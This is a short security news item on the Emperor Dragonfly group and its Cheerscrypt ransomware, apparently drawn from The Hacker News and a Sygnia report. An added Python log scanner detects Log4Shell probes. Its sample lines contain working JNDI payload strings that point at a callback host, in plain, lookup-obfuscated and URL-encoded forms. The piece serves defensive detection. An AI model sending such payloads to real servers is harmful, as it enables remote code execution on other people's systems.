The Chinese cyberespionage group Emperor Dragonfly, also tracked as Bronze Starlight and DEV-0401, has been linked to the new Linux-based ransomware strain Cheerscrypt, The Hacker News reports.
Emperor Dragonfly's use of Cheerscrypt follows its deployment of LockBit 2.0, AtomSilo, Rook, LockFile, Night Sky, and Pandora ransomware over the past 12 months, according to a report from Sygnia.
"Emperor Dragonfly deployed open source tools that were written by Chinese developers for Chinese users. This reinforces claims that the 'Emperor Dragonfly' ransomware operators are based in China," said Sygnia.
Emperor Dragonfly has targeted VMware Horizon servers by exploiting the Log4Shell flaw to deliver an encrypted Cobalt Strike beacon, which is deployed alongside a keylogger, the iox proxy and port-forwarding utility, and the NPS tunneling software, the researchers said.
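A defender reading the above will want to know whether their own Horizon front end saw the same Log4Shell entry point. The following Python script is an added example, not code from Sygnia or The Hacker News: it scans web-server access log lines for the JNDI lookup string that Log4Shell exploitation requires, normalising URL encoding and the nested `${lower:...}` / `${upper:...}` / `${...:-x}` lookups attackers use to defeat a plain `${jndi:` match, and reports the callback host so it can be blocked or hunted for. The log lines are constructed samples in a simplified combined-log layout, and the IP addresses are documentation ranges, not indicators from the report.

```python
import re
from urllib.parse import unquote

# Constructed sample web-server log lines (simplified combined-log layout, not real
# Horizon logs and not from the Sygnia report): a benign request, three Log4Shell
# probes in plain, lookup-obfuscated and URL-encoded form, and another benign request.
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [12/Jan/2022:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [12/Jan/2022:10:01:07 +0000] "GET /portal/info.jsp HTTP/1.1" 200 128 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.9 - - [12/Jan/2022:10:01:09 +0000] "GET /portal/info.jsp HTTP/1.1" 200 128 "-" "${${lower:j}${upper:n}di:${::-l}dap://198.51.100.7:1389/b}"',
    '203.0.113.9 - - [12/Jan/2022:10:01:11 +0000] "GET /portal/info.jsp?x=%24%7Bjndi%3Armi%3A%2F%2F198.51.100.7%3A1099%2Fc%7D HTTP/1.1" 200 128 "-" "curl/7.79"',
    '203.0.113.6 - - [12/Jan/2022:10:02:00 +0000] "GET /portal/webclient/index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

# Log4j lookups attackers nest inside the payload to defeat naive "${jndi:" matching:
# ${lower:x} / ${upper:x} evaluate to x, and ${anything:-x} evaluates to the default x.
CASE_LOOKUP_RE = re.compile(r"\$\{\s*(?:lower|upper)\s*:\s*([^${}]*)\}", re.IGNORECASE)
DEFAULT_LOOKUP_RE = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# After normalisation the exploit string collapses to ${jndi:<scheme>:[//]<host[:port]>...
JNDI_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)\s*:/*([^/}\s\"]+)",
    re.IGNORECASE,
)


def normalise(text, max_decode_rounds=3):
    """URL-decode (bounded, to survive double encoding) and collapse nested lookups."""
    for _ in range(max_decode_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    previous = None
    while previous != text:  # innermost lookups first, repeat until nothing changes
        previous = text
        text = CASE_LOOKUP_RE.sub(lambda m: m.group(1), text)
        text = DEFAULT_LOOKUP_RE.sub(lambda m: m.group(1), text)
    return text


def scan_log(lines):
    """Return one hit per line carrying a JNDI lookup: line index, scheme, callback host."""
    hits = []
    for index, line in enumerate(lines):
        match = JNDI_RE.search(normalise(line))
        if match:
            hits.append({
                "line": index,
                "scheme": match.group(1).lower(),
                "callback": match.group(2),
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG_LINES):
        print(f"line {hit['line']}: jndi {hit['scheme']} lookup to {hit['callback']}")
```

The normalisation step is the part worth keeping: a rule that only greps for `${jndi:` misses the second and third sample lines, which is exactly the obfuscation seen in real Log4Shell traffic. Feed the function the lines of your Horizon or reverse-proxy access log (the script reads from an in-memory list only so it runs offline) and treat any non-empty result as a reason to check that host for the follow-on tooling named above.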
The report also noted that the Cheerscrypt intrusions and Emperor Dragonfly's earlier Night Sky ransomware attacks shared the same initial access vector, the same encrypted Cobalt Strike beacon delivery, and the same lateral movement approach.